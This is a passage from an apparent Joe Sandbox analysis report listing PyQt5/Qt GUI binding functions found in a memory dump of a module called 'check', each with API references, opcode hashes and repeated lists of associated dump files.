                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBorderBrush@Brush@@@CellFormat@@TableText
                                                                                                                                                                                                                                          • String ID: BJ1$QTextTableCellFormat$setBorderBrush$setBorderBrush(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 905436713-2657798177
                                                                                                                                                                                                                                          • Opcode ID: e3a672cc5b4590fe9710d43a9150c6a2154369981335f7067e548da476a7dd5b
                                                                                                                                                                                                                                          • Instruction ID: 3704da36c353edf08b2a964bb99a9fa612bcce4e97423b2e5fe67676e3303510
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3a672cc5b4590fe9710d43a9150c6a2154369981335f7067e548da476a7dd5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6421D377A08B86D5DB209F11E8892A933B4FB48BD0F918132DA9E43720EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D952040 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setHorizontalHeaderLabels@QStandardItemModel@@QEAAXAEBVQStringList@@@Z.QT5GUI ref: 00007FF89D9520B0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setHeaderHorizontalItemLabels@List@@@Model@@StandardString
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItemModel$setHorizontalHeaderLabels$setHorizontalHeaderLabels(self, labels: Iterable[Optional[str]])
                                                                                                                                                                                                                                          • API String ID: 1012491943-3289042179
                                                                                                                                                                                                                                          • Opcode ID: e4706b947a9b4cf1f0e85d58469cccdd0e4f76a750d0f5fdc2c6b1107025b8ed
                                                                                                                                                                                                                                          • Instruction ID: 6ccaf90bdadc957a8a8aa248aa9d3427d91540f3ec3dd6f21a2765f9ec3c98bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4706b947a9b4cf1f0e85d58469cccdd0e4f76a750d0f5fdc2c6b1107025b8ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8421D377A08B46C5DB608F15E8895A933B8FB48BD0F918132DA9E83320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D961FC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDescription@PictureString@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QPictureIO$setDescription$setDescription(self, a0: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 4148849819-861822539
                                                                                                                                                                                                                                          • Opcode ID: 7d200b497ff0893bdb64659acce8d6841a9d670a14f4d1f14fcd2f4fe2700763
                                                                                                                                                                                                                                          • Instruction ID: 83a4cbe8f02e13b49acde33dded6a2eaec5d242bd882b73451ae863d80cd2071
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d200b497ff0893bdb64659acce8d6841a9d670a14f4d1f14fcd2f4fe2700763
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21E477A08B46D1EB609F11E8891A933B4FB48FD0F918132DA9E43320EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D9B7FD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBackground@Brush@@@Item@@Standard
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItem$setBackground$setBackground(self, abrush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3902448675-3429220716
                                                                                                                                                                                                                                          • Opcode ID: 5eee38ef73fb0049554854adb2cd5a58e1da4546df682be1d8b158b8b055f7fa
                                                                                                                                                                                                                                          • Instruction ID: f485c1737acaa4944edf60547a22fa653bce92e14d22e54de6d59002a3778f65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eee38ef73fb0049554854adb2cd5a58e1da4546df682be1d8b158b8b055f7fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3021D377A09B46C1DB209F11E8891A933B4FB48BD0F918136CA9E43320EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D9B5F00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setItem@@StandardString@@@Text@
                                                                                                                                                                                                                                          • String ID: BJ1$QStandardItem$setText$setText(self, atext: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3857957717-3918002662
                                                                                                                                                                                                                                          • Opcode ID: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
                                                                                                                                                                                                                                          • Instruction ID: 4e7e32212c51afee985f924c7dfc9d91bef2d23756f8aec66f119025c73f153e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D21D377A08B46C1DB209F11E8891A973A8FB48BD0F918032DA9E43720EF39E559C744
                                                                                                                                                                                                                                          Function 00007FF89D98DEC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FF89D98DF28
                                                                                                                                                                                                                                          • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FF89D98DF34
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QPalette$base$base(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 868068763-3618895797
                                                                                                                                                                                                                                          • Opcode ID: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
                                                                                                                                                                                                                                          • Instruction ID: 8f38c4dfe347344032162b5d910c8112180cedd163ac2e98f9e4c51141473bac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6111977A18A46C6EB209F11E8497A933A4FB44FD0F914036DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D98FD00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FF89D98FD68
                                                                                                                                                                                                                                          • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FF89D98FD74
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QPalette$highlightedText$highlightedText(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 868068763-3394257884
                                                                                                                                                                                                                                          • Opcode ID: 5dec472b35c8dfa69d6c4d68c5599f954c391fbcb6e0b12ea3f467851b48b76c
                                                                                                                                                                                                                                          • Instruction ID: 4a985fe259735cb7fa4f692e4a6930adb7f033b9da03fffc5d9b187078e47d53
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dec472b35c8dfa69d6c4d68c5599f954c391fbcb6e0b12ea3f467851b48b76c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1111976B18A8686EB109F11E8497A933A4FB84FD0F914036DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D960020 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
